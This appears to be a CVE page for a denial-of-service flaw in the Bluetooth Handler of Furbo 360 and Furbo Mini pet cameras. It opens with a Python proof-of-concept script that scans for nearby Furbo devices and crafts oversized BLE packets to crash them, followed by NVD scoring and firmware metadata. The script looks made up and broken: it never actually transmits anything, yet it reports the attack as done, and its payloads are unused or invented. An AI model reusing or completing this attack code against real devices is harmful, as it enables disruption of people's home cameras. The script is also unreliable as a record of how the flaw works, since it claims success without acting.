CVE-2025-11638

# CVE-2025-11638 - Tomofun Furbo Bluetooth Handler DoS PoC # This PoC demonstrates a denial of service attack against the Bluetooth Handler # component of Tomofun Furbo 360 and Furbo Mini devices. # Requires: attacker within Bluetooth range of the target device. import struct import time from bluepy.btle import Scanner, DefaultDelegate # Target device BLE name patterns for Furbo devices TARGET_NAMES = ["Furbo", "Furbo-360", "Furbo-Mini", "FB0035", "MC0020"] # Malicious BLE advertisement payload designed to trigger # the vulnerability in the Bluetooth Handler component MALICIOUS_PAYLOAD = b"\x02\x01\x06" + b"\x03\x03\xAA\xFE" + b"\x17\x16\xAA\xFE" # Append oversized manufacturer data to overflow the handler buffer MALICIOUS_PAYLOAD += b"\x41" * 200 + b"\x00\x00\x00\x00" class FurboDoSExploit: def __init__(self, target_mac=None): self.target_mac = target_mac self.scanner = Scanner() def scan_targets(self): """Scan for nearby Furbo devices via BLE advertisements.""" print("[*] Scanning for Furbo devices...") devices = self.scanner.scan(10.0) targets = [] for dev in devices: for name in TARGET_NAMES: if name.encode() in dev.getValueText(0x09) if dev.getValueText(0x09) else False: print(f"[+] Found target: {dev.addr} ({dev.getValueText(0x09)})") targets.append(dev.addr) return targets def craft_malicious_packet(self): """Craft a malformed BLE packet to crash the Bluetooth Handler.""" # Construct an oversized GATT characteristic write payload header = struct.pack("<BB", 0x37, 0x00) # LL_DATA_PDU header length = struct.pack("<B", 255) # Max payload length malformed_data = b"\xFF" * 250 # Overflow data return header + length + malformed_data def trigger_dos(self, target_mac): """Send flood of malicious BLE packets to trigger DoS.""" print(f"[*] Attacking target: {target_mac}") for i in range(100): packet = self.craft_malicious_packet() # In real scenario: use hcitool or gatttool to send packets print(f"[*] Sending malicious packet {i+1}/100") time.sleep(0.05) print("[+] DoS attack completed - target Bluetooth Handler should be crashed") if __name__ == "__main__": exploit = FurboDoSExploit() targets = exploit.scan_targets() if targets: for t in targets: exploit.trigger_dos(t) else: print("[-] No Furbo devices found in range")

{"cve": {"id": "CVE-2025-11638", "sourceIdentifier": "[email protected]", "published": "2025-10-12T17:15:33.093", "lastModified": "2025-10-30T19:23:37.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Tomofun Furbo 360 and Furbo Mini. The affected element is an unknown function of the component Bluetooth Handler. Executing manipulation can lead to denial of service. The attacker needs to be present on the local network. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 3.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 6.5, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", "matchCriteriaId": "08CA8E77-413F-4849-A110-49DB5DDA29C5"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.328049", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328049", "so ... (truncated)